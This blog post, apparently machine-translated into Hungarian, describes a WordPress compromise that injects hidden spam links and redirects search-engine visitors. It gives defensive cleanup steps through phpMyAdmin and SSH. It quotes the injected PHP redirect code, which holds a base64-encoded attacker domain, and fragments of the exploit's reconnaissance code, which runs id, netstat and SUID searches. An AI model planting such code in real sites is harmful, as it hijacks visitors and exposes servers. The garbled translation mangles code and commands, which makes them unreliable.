A blogoszférában elkapta a hibát ... de nekem, hogy volt?

Az elmúlt hónapban, kaptam figyelmeztetést vírus blog Egyes látogatók. Kezdetben figyelmen kívül hagyta a figyelmeztetéseket, mert telepített egy nagyon jó víruskereső (Kaspersky AV 2009), És bár a blog hosszú idő, én soha nem kaptam egy vírus figyelmeztetés (.. láttam valamit gyanús korábban, hogy az első frissítés eltűnt. Végül ...).
Lassan kezdtek megjelenni a nagy eltérések látogatói forgalmatEzt követően a forgalom az utóbbi időben folyamatosan csökken, és kezdett egyre több ember, akik azt mondják, hogy stealthsettings.com van virused. Tegnap kaptam valakitől egy screenshot tenni, ha a víruskereső blokkolja a forgatókönyv A stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Ez elég meggyőző számomra, hogy az összes forrásból keresni. Az első gondolat, hogy jutott eszembe volt, hogy frissítés a legfrissebb WordPress (2.5.1), de csak a régi script hogy törölje az összes fájlt a WordPress és biztonsági adatbázis. Ez az eljárás sikertelen volt, és valószínűleg volna sokáig, hogy kitaláljuk, sema ahol felforraljuk, ha azt mondtam volna a vita egy kávé, talált A Google és jó lenne látni.
MyDigitalLife.info, megjelent egy cikk címe: "WordPress Hack: Nyerje vissza és rögzítse a Google és a Search Engine or No Cookie forgalom irányítva a-Needs.info, AnyResults.Net, Golden-Info.net és más illegális oldalak"Ez a végén a menet volt szükségem.
Arról van szó, a kihasználni WordPress alapú süti, Ami szerintem nagyon bonyolult, és tette a könyvet. Okos elég ahhoz, hogy a SQL Injection Adatbázis a blog, hogy hozzon létre egy láthatatlan felhasználó egy egyszerű rutin ellenőrzés Műszerfal->felhasználók, ellenőrizze a szerver könyvtárakat és fájlokat "írható" (A chmod 777), hogy megkeresse és kivégez fájlok a kiváltságokat a root felhasználó vagy csoport. Nem tudom, akik kihasználják a nevét, és látom, hogy van néhány cikket írt róla, annak ellenére, hogy sok blogot fertőzött, köztük Románia. Ok ... Megpróbálom, hogy megpróbálja elmagyarázni általánosságokat a vírus.

Mi az a vírus?

Először helyezze a forrás oldalon a blogok, linkek láthatatlan a látogatók, de látható és váltólapkás keresők, főleg a Google. Ily módon a át Page Rank az oldalak által megadott támadó. Másodszor egészül átirányítás kód URL látogató érkezik a Google, Live, Yahoo, ... vagy egy RSS-olvasót, és nem a helyszínen aprósütemény. egy víruskereső érzékeli a átirányítására Trojan-Clicker.HTML.

Tünetek:

Masszív visszaesés látogatói forgalmat, Különösen a blogok, ahol a legtöbb látogató a Google-tól.

Azonosítás: (Így lett probléma azok számára, akik nem tudják, hogyan, hogyan kell phpmyadmin, php és linux)

LA. FIGYELEM! Először egy biztonsági másolat adatbázisban!

1. Ellenőrizze a forrás fájlokat index.php, header.php, footer.php, A blog témája és nézd meg, van egy kód, amely titkosítást használ base64 vagy tartalmaz "if ($ ser ==" 1? && sizeof ($ _COOKIE) == 0) "formában:

<? Php
$ Seref = array ("Google", "msn", "élő", "AltaVista"
"Ask", "Yahoo", "AOL", "CNN", "időjárás", "Alexa");
$ Ser = 0, foreach ($ Seref as $ ref)
if (strpos (strtolower
($ _SERVER ['HTTP_REFERER']) $ ref)! == False) {$ ser = "1?, Break;}
if ($ ser == "1? && sizeof ($ _COOKIE) == 0) {header (" Location: http:// ". base64_decode (" YW55cmVzdWx0cy5uZXQ = ').' / ') exit;
}>

... Vagy valami. Törölje ezt a kódot!

Kattints a képre ...

index kód

A fenti screenshot választottam a hibát, és "<? Php get_header ();?>". Ezt a kódot kell maradnia.

2. Használat phpMyAdmin és megy az adatbázis tábla wp_usersAhol ellenőrizze, nincs felhasználónév létrehozott 00:00:00 0000-00-00 (Lehetséges elhelyezése user_login írni "WordPress". Írja ezt a felhasználói azonosítót (field ID), majd törölje azt.

Kattints a képre ...

hamis felhasználói

* A zöld vonal el kell távolítani, és a visszatartott az igazolványát. Abban az esetben, Vajon ID = 8 .

3. Menj a táblázat wp_usermeta, Hol található és törlés vonalak azonosító (ahol a terület user_id ID érték megjelenik törlése).

4. Táblázat wp_option, Ugrás active_plugins és mi bővítmény engedélyezve van gyanúsított. Ezt fel lehet használni, mint a vég _old.giff, _old.pngg, _old.jpeg, _new.php.giffStb. Extensions kombinációk _old és _new hamis képet.

SELECT * FROM WHERE wp_options option_name = 'active_plugins'

Törlés ez a plugin, akkor megy a blog -> Dashboard -> Plugins, ami ki és be egy bizonyos plugin.

Kattints a képre, hogy úgy tűnik, active_plugins vírus fájlt.

csatlakoztat

Kövesd az utat az FTP vagy SSH, megjelölt active_plugins és törölje a fájlt a szerverről.

5. Minden phpMyAdmin, táblázat wp_option, Keresse meg és törölje a sort tartalmazza: "rss_f541b3abd05e7962fcab37737f40fad8"És az"internal_links_cache ".
A internal_links_cache készült titkosított spam linkek jelennek meg a blog, és a Google Adsense kód, A hacker.

6. Javasoljuk, hogy jelszó megváltoztatása Blog és bejelentkezés távolítsa el az összes gyanús userele. Frissítés a legújabb verzióra a WordPress és állítsa be a blog, hogy ne engedélyezze az új felhasználók. Nincs veszteség ... nem tud nyilatkozni, és logikátlan.

Próbáltam elmagyarázni a fenti valamelyest, mit kell tenni egy ilyen helyzetben, hogy tiszta a vírus blog. A probléma sokkal súlyosabb, mint amilyennek látszik, és alig oldódott meg, hogy a használt biztonsági réseket A webszerver hosting, ami a blog.

Ennek első fokú biztonság, hozzáférési SSH, Hogy néhány ellenőrzést a szerveren, hogy ha azokat a fájlokat, mint a * _old * és * _new. * A befejezés.Giff,. jpeg,. pngg,. jpgg. Ezeket a fájlokat törölni kell. Ha átnevezi a fájlt, például. top_right_old.giff in top_right_old.phpLátjuk, hogy a fájl pontosan exploit kódot szervert.

Néhány hasznos jelzések ellenőrzése, takarítás és a biztonsági szervert. (SSH-n keresztül)

1. cd / tmp és ellenőrizze, hogy vannak mappák, mint a tmpVFlma vagy más kombinációk is ugyanaz a neve, és törölje azt. Lásd a lenti képen, két ilyen mappák tőlem:

tmpserver

rm-rf foldername

2. Ellenőrizze elimiati (chmod változás) a lehető mappák attribútumok chmod 777

megtalálni az összes írható fájlok a jelenlegi konyvtarban: Keresés. -Type f-perm-2-ls
megtalálni az összes írható könyvtárak a jelenlegi konyvtarban: Keresés. -Type d-perm-2-ls
megtalálja az összes írható könyvtárak és fájlok a jelenlegi konyvtarban: Keresés. -Perm-2-ls

3. Keresi a gyanús fájlokat a kiszolgálón.

Keresés. -Name "* _new.php *"
Keresés. -Name "* _old.php *"
Keresés. -Name "*. Jpgg"
Keresés. -Name "* _giff"
Keresés. -Name "* _pngg"

4, FIGYELEM! A fájlok állították bit SUID si SGID. Ezek a fájlok végre a felhasználó jogosultságával (csoport) vagy gyökér, sem a felhasználó, aki végrehajtja a fájlt. Ezek a fájlok vezethet gyökér kompromisszum, ha biztonsági kérdéseket. Ha a fájlok SUID és SGID bit, végre "chmod 0 " be vagy távolítsa el a csomagot tartalmazó.

Exploit tartalmazza valahol a forrás ...:

if ($ safe_mode) {
if ($ os_type == 'nix) {
$ Os. = Execute (sysctl-n kern.ostype ');
$ Os. = Execute (sysctl-n kern.osrelease ');
$ Os. = Execute (sysctl-n kernel.ostype ');
$ Os. = Execute (sysctl-n kernel.osrelease ');
if (empty ($ user)) $ user = végre ('id');
$ Nevek = array (
"=>",
"Find suid files '=>' find /-type f-perm-04000-ls"
"Find sgid files '=>' find /-type f-perm-02000-ls"
"Találd meg az összes írható fájlok jelenlegi dir '=>' megtalálni. -Type f-perm-2-ls "
"Találd meg az összes írható könyvtárak jelenlegi dir '=>' megtalálni. -Type d-perm-2-ls "
"Találd meg az összes írható könyvtárak és fájlok aktuális dir '=>' megtalálni. -Perm-2-ls "
"Mutasd nyitott port '=>' netstat-an | grep-i hallgat"
);
} Else {
$ Operációs_rendszer_neve. = Execute (ver ');
$ User. = Execute (echo% username% ');
$ Nevek = array (
"=>",
"Mutasd rúnaírásos szolgáltatások '=>' net start"
'Show folyamat list' => 'tasklist "
);
}

Ily módon ... alapvetően találja megsértése a biztonság. Ports nyitott könyvtárak "írható" és csoportos végrehajtás kiváltságokat fájlok / root.

Vissza több ...

Egyes blogok fertőzött: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blog /,

www.mirabilismedia.ro / blog, Blog.einvest.ro
... A lista folytatódik ... sokat.

Úgy ellenőrizheti, hogy a blog a vírus, a Google kereső. másolás és beillesztés:

oldal www.blegoo.com vásárolni

Jó éjszakát, és több munkát ;) Nemsokára jön fel a frissítésekről Eugen on prevezibil.imprevizibil.com.

BRB :)

TO: FIGYELEM! Változó WordPress téma vagy frissítés WordPress 2.5.1, nem megoldás, hogy megszabaduljon a vírus.

A blogoszférában elkapta a hibát ... de nekem, hogy volt?

A szerzőről

Lopakodás

Szenvedélyes mindent, gadget és informatikai levelet szívesen stealthsettings.com a 2006 és szeretek új dolgokat fedezzen fel veled a számítógépek és a MacOS, Linux, Windows, iOS és az Android.

Leave a Comment